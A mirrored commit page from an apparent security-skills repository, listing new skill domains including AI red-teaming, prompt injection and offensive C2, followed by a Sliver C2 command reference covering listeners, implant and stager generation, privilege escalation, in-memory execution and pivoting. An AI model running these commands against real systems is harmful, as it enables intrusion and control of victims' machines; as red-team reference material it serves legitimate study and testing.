mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-08-04 01:40:19 +03:00
Demand-driven expansion targeting the fastest-growing 2025-2026 threat and
skills categories (ISC2/WEF/CrowdStrike/Mandiant signals):
- AI Security (NEW domain, 12 skills): LLM red-teaming with garak/PyRIT,
prompt injection (direct/indirect/RAG), MCP tool-poisoning, agentic tool
invocation, guardrails, model/data poisoning, system-prompt leakage,
embedding/vector weaknesses, model extraction, continuous red-teaming
- Supply Chain Security (NEW domain, 5 skills): SBOMs, dependency confusion,
malicious-npm triage, typosquatting, SLSA/Sigstore provenance
- Hardware & Firmware Security (NEW domain, 4 skills): CHIPSEC/UEFI audit,
Secure Boot bypass, TPM measured-boot attestation, ESP bootkit hunting
- Identity (10): Entra ID/ROADtools, GraphRunner, AADInternals, ADCS/Certipy,
shadow credentials, coercion, BloodHound CE, device-code phishing, SSO abuse
- Cloud-native (8): Stratus, Pacu, CloudFox, container escape, K8s RBAC,
Falco, Trivy, kube-bench
- Offensive C2 (6): Sliver, Havoc, NetExec, DPAPI, NTLM relay ESC8, redirectors
- DFIR (6): Hayabusa, Chainsaw, KAPE, Velociraptor, EZ Tools, Plaso
- Backfill (4): OpenCTI, MISP, honeytokens, post-quantum crypto migration
Each skill follows the repo taxonomy (SKILL.md + references/{standards,api-reference}.md
+ scripts/agent.py + LICENSE), with researched real tool commands (no placeholders),
complete frontmatter, and ATT&CK/ATLAS + NIST CSF mappings. Updates README domain
table, skill count, and index.json.
3.3 KiB
3.3 KiB
Sliver C2 Command Reference
Source: BishopFox Sliver Wiki (https://github.com/BishopFox/sliver/wiki) and console help.
Server / multiplayer
| Command | Description |
|---|---|
sliver-server |
Launch the server console (single-player) |
multiplayer --lport 31337 |
Start the multiplayer gRPC listener |
new-operator --name NAME --lhost HOST --save FILE.cfg |
Generate an operator config file |
sliver-client import FILE.cfg |
Import operator config into the standalone client |
version |
Print server/client version |
jobs / jobs -k ID |
List / kill background listener jobs |
Listeners (C2 jobs)
| Command | Description |
|---|---|
mtls --lport 443 |
Start a Mutual TLS listener |
https --lport 443 |
Start an HTTPS listener |
http --lport 80 |
Start a plain HTTP listener |
dns --domains c2.example.com. --lport 53 |
Start a DNS listener for a delegated zone |
wg --lport 53 |
Start a WireGuard listener |
stage-listener --url tcp://HOST:8443 --profile NAME |
Serve a staged payload |
Implant generation
| Command / flag | Description |
|---|---|
generate --mtls HOST:443 |
Generate a session implant over mTLS |
generate beacon --mtls HOST:443 --seconds 60 --jitter 30 |
Generate a beacon with check-in interval and jitter |
--http HOST / --dns ZONE. / --wg HOST |
Select alternative C2 channels |
| `--os windows | linux |
| `--arch amd64 | 386 |
| `--format exe | shellcode |
--save PATH |
Output directory |
--tcp-pivot HOST:PORT |
Build an implant that connects to a TCP pivot |
generate stager --lhost HOST --lport PORT --arch amd64 --format c |
Generate a stager |
implants / implants rm NAME |
List / delete built implants |
profiles new ... NAME / profiles |
Save/list reusable implant profiles |
Session / beacon interaction
| Command | Description |
|---|---|
sessions / use SESSION_ID |
List / select interactive sessions |
beacons / use BEACON_ID |
List / select beacons |
info |
Implant metadata |
whoami / getprivs |
Identity and privileges |
ps -T |
Process list (with protection flags) |
ls, cd, download, upload, cat, rm |
File operations |
netstat, ifconfig |
Network state |
screenshot |
Capture screen |
execute -o CMD ARGS |
Run a command and capture output |
shell |
Interactive system shell (noisy) |
migrate PID |
Migrate into another process |
make-token -u DOMAIN\\user -p PASS |
Create an alternate logon token |
getsystem |
Attempt SYSTEM escalation |
kill |
Terminate the implant |
Armory (extensions / aliases)
| Command | Description |
|---|---|
armory |
List available packages |
armory install all / armory install NAME |
Install BOFs / .NET aliases |
armory update |
Update installed packages |
inline-execute-assembly PATH ARGS |
Run a .NET assembly in-memory |
Pivoting
| Command | Description |
|---|---|
socks5 start --port 1081 |
Start a SOCKS5 proxy through the implant |
portfwd add --bind 127.0.0.1:LP --remote HOST:RP |
Add a port forward |
pivots tcp --bind 0.0.0.0:9898 |
Start a TCP pivot listener on the beachhead |
pivots |
Show the pivot graph |